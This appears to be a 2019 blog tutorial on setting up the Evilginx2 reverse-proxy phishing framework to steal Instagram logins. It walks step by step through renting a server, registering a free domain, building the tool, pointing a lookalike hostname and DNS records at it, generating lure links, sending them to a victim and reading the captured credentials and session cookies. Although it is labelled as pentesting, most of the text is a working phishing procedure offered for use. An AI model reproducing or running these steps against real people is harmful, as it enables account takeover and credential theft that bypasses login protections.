by hash3liZer . 23 May 2019
Phishing is one of many fraudlent attacks done in order to accomplish something out of a user or coercing the user in performing some unintended action. So, basically the attack is acheived by showing the user a forged document from what the user is already used to.
Whilst the document is controlled or owned by the attacker. This is where Evilginx 2 comes in the picture. It's a reverse proxy framework which stands in between the user and the orignal website.
Evilginx2 is a proxying MITM framework designed for pentesting and red teaming 💀 purposes. It hosts a web-server on the backend where the actual proxying will happen. The foremost awesome feature of this tool is the phishlets. Phishlets are configuration files in YAML syntax for the target website.
Now, at first we need a server and a domain name to map the evilginx2 services. For the domain name part, since we are not going to make an official site, all we need is a test domain. And freenom is the far best service we know for getting free domains. Signup on freenom and setup a new domain name.
Then we need a server where everything will be proxied. Go to DigitalOcean website and buy yourself a new droplet (Ubuntu) with minimum package of 5$ available. Don't worry, you will only be charged for the usage of the droplet. You can destroy it after you've accomplished your task and the charges will apply to that specific time period only.
You will be sent an email with your droplet password. When you have both of these things, finally login to the server using Secure Shell (SSH). Copy the ip and login directly to the root account:
$ ssh firstname.lastname@example.org
You will be prompted to setup a new password before you are able to use your server.
Coming to part of installation, evilginx2 is written in Golang and we would need the go libraries to compile the evilginx2 source files. First, update the environment and install necessary packages:
$ sudo apt update
$ sudo apt install git make wget
After you have installed each of them, now download the Golang directly from the internet using wget:
$ wget https://dl.google.com/go/go1.10.linux-amd64.tar.gz
Extract the golang binaries and place them under the directory: /usr/local/
$ tar -C /usr/local -xzf go1.10.linux-amd64.tar.gz
We will be creating a temporary environment for executing the required golang command. Just Copy/Paste the following two commands in your terminal:
$ export GOPATH=$HOME/go
$ export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
Finally, clone the evilginx2 repository from github using golang:
$ go get -u github.com/kgretzky/evilginx2
This will clone the repository in the go directory which can be found in the current home directory. In simple, just move to the following directory:
Finally, compile the evilginx2 source files and change the permissions of the compiled file:
$ go build main.go
$ chmod 777 main
Optionally, you can make a symbolic link to the compiled version, so you can execute the command from any directory:
$ ln -s /root/go/src/github.com/kgretzky/evilginx2/main /usr/bin/evilginx2
$ ln -s /root/go/src/github.com/kgretzky/evilginx2/phishlets /root/phishlets
Then execute the command directly from terminal:
$ sudo evilginx2
Here, comes the part to the configuration where we will use a phishlet to sniff the user credentials from server. Let's our target be instagram. Consider you have got a domain from freenom by the name "mytestnethub.tk". Now, on the evilginx2 terminal, first setup the domain and ip config:
$ config domain mytestnethub.tk
$ config ip 126.96.36.199
Where ip is the ip address of the same server you are working on. Now, since we are going to create a phishing site for instagram, we need a hostname which will redirect all the traffic from the user to the orignal site. Let's the hostname for instagram along with our fake domain be "instagram.com.mytestnethub.tk". Setup the hostname for the phishlet:
$ phishlets hostname instagram instagram.com.mytestnethub.tk
Here the highlighted word instagram refers to the name of the phishlets located in the /root/phishlets directory. You can see the list of all available phishlets by typing in:
Here comes the part where we will configure our DNS records for mytestnethub.tk. To know exactly what subdomains to add to your dns records, start the phishlet service. You will get the dns resolving error:
$ phishlets enable instagram
From the above screenshot, we can see the dns resolving errors with their respective domains. Now, let's setup the dns records. First, point the top level domain and www subdomain to the server ip address:
Then for each subdomains (2 in our case) given in the error, create a new CNAME entry with the target pointing to the top level domain which in our case is mytestnethub.tk. The final records will look something like this:
Wait for a few minutes for the dns server to propagate the changes. Then re-enable the instagram phishlet:
$ phishlets enable instagram
After the phishlet is up and running, we need a url which we will send to our user and from where he will be redirected to our proxied site. Evilginx2 provides a seperate command for this with which you can create more than one redirection urls at a time. Spawn a new url:
$ lures create instagram
This will provide you with an id assigned to the newly created url. Moreover, you can view the list of all available redirection urls by typing lures command:
To get the url for a specific id, type in:
$ lures get-url 0 // 0 id the id assigned to the url created for instagram
Let's come to the exploitation part. Copy the url you got from last command and send it to a user. Coming to victim side, the victim opens the urls and is prompted by the instagram login page which would look exactly like the orignal page. And if are able to fool enough your target into engaging with that page, you will be notified on evilginx2 terminal.
You will get successful login attempt from that user in the form of both cookies and credentials. Here's what it would look like:
To see all the captured sessions:
And for a specific session:
$ sessions [ID]
Up until now, you might have got the idea of evilginx2 functionality and how does it works. To be more specific, you might be looking for sites which are not available with the current evilginx2 version. This is where the phishlets come handy. Why not create your own phishlet? They are simple YAML configuration files.
All you need to know is which request to intercept and which one is to be redirected. For a complete guide on how to create your own phishlet from scratch, please refer to this guide: Phishlet File Format Guide (2.3.0). Later you can upload them using secure ftp protocol on the server.